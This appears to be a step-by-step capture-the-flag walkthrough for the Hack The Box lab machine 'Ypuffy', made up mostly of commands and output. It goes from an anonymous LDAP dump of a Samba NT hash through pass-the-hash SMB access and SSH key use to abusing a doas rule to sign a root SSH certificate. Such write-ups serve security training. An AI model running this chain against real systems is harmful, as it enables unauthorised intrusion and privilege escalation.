1. nmap

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
80/tcp  open  http        OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
Service Info: Host: YPUFFY

2. nmap -p 389 --script ldap-search 10.10.10.107

...
|     dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
|         uid: alice1978
|         cn: Alice
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: sambaSamAccount
|         userPassword: {BSDAUTH}alice1978
|         uidNumber: 5000
|         gidNumber: 5000
|         gecos: Alice
|         homeDirectory: /home/alice1978
|         loginShell: /bin/ksh
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
|         displayName: Alice
|         sambaAcctFlags: [U          ]
|         sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
|         sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
|         sambaPwdLastSet: 1532916644
...

3. smbclient -L 10.10.10.107 -U alice1978 --pw-nt-hash //10.10.10.107/ 0B186E661BBDBDCF6047784DE8B9FD8B

	Sharename       Type      Comment
	---------       ----      -------
	alice           Disk      Alice's Windows Directory
	IPC$            IPC       IPC Service (Samba Server)

4. smbclient -U alice1978 --pw-nt-hash //10.10.10.107/alice/ 0B186E661BBDBDCF6047784DE8B9FD8B

5. puttygen my_private_key.ppk -O private-openssh -o alice_private
get the private key

6. ssh -i alice_private alice1978@10.10.10.107

7. ypuffy$ cat /etc/doas.conf  
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen

8. 
doas -u userca /usr/bin/ssh-keygen -f /tmp/userca
doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n root -I terry /tmp/userca.pub

9. ssh-keygen -Lf /tmp/userca-cert.pub   (view cert info)


